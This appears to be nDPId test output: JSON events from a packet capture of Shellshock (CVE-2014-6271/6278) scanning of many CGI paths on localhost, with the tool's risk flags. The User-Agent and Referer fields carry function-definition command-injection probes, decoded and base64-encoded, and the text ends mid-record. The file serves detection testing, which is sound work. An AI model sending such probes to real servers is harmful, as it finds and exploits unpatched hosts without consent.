-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1576420277402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277402,"pkt":"AAAAAAAAAAAAAAAACABFAAENn\/9AAEAGm+l\/AAABfwAAAcUiH5Cfgqc8sQq4SIAYAED\/AQAAAQEICp1m\/cKdZv3CR0VUIC9kb3dubG9hZC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/download.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1576420277403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277403,"pkt":"AAAAAAAAAAAAAAAACABFAAESp5VAAEAGlE5\/AAABfwAAAcUkH5At0J9VXKwRhYAYAED\/BgAAAQEICp1m\/cOdZv3DR0VUIC9lbnRyb3B5c2VhcmNoLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01173{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/entropysearch.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1576420277405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277405,"pkt":"AAAAAAAAAAAAAAAACABFAAEI2lVAAEAGYZh\/AAABfwAAAcUmH5ARUOKViVHVaYAYAED+\/AAAAQEICp1m\/cSdZv3ER0VUIC9lbnYuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/env.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1576420277406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":286,"pkt_l4_len":252,"thread_ts_msec":1576420277406,"pkt":"AAAAAAAAAAAAAAAACABFAAEQ2p9AAEAGYUZ\/AAABfwAAAcUoH5D43eJbIwWC0IAYAED\/BAAAAQEICp1m\/cadZv3GR0VUIC9lbnZpcm9ubWVudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01171{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/environment.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1576420277407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277407,"pkt":"AAAAAAAAAAAAAAAACABFAAENbStAAEAGzr1\/AAABfwAAAcUqH5C5flXvg270eYAYAED\/AQAAAQEICp1m\/cedZv3HR0VUIC9lem1sbS1icm93c2UgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ezmlm-browse","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1576420277409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277409,"pkt":"AAAAAAAAAAAAAAAACABFAAENkcFAAEAGqid\/AAABfwAAAcUsH5BKNKl4Ee+JJYAYAED\/AQAAAQEICp1m\/cmdZv3JR0VUIC9mb3JtbWFpbC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} 
-01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/formmail.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1576420277410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277410,"pkt":"AAAAAAAAAAAAAAAACABFAAEToPJAAEAGmvB\/AAABfwAAAcUuH5CLPJg5VfIqUIAYAED\/BwAAAQEICp1m\/cqdZv3KR0VUIC9Gb3JtTWFpbC1jbG9uZS5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/FormMail-clone.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1576420277412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277412,"pkt":"AAAAAAAAAAAAAAAACABFAAEOAyBAAEAGOMh\/AAABfwAAAcUwH5BOyzvYEAppQYAYAED\/AgAAAQEICp1m\/cydZv3MR0VUIC9ndWVzdGJvb2suY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01169{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1576420277414,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277414,"pkt":"AAAAAAAAAAAAAAAACABFAAENCPdAAEAGMvJ\/AAABfwAAAcUyH5A4wTA94El3uoAYAED\/AQAAAQEICp1m\/c6dZv3OR0VUIC9oZWxwZGVzay5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/helpdesk.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1576420277416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277416,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgptAAEAGuVB\/AAABfwAAAcU0H5CIJLpUcW+qJoAYAED+\/gAAAQEICp1m\/dCdZv3QR0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 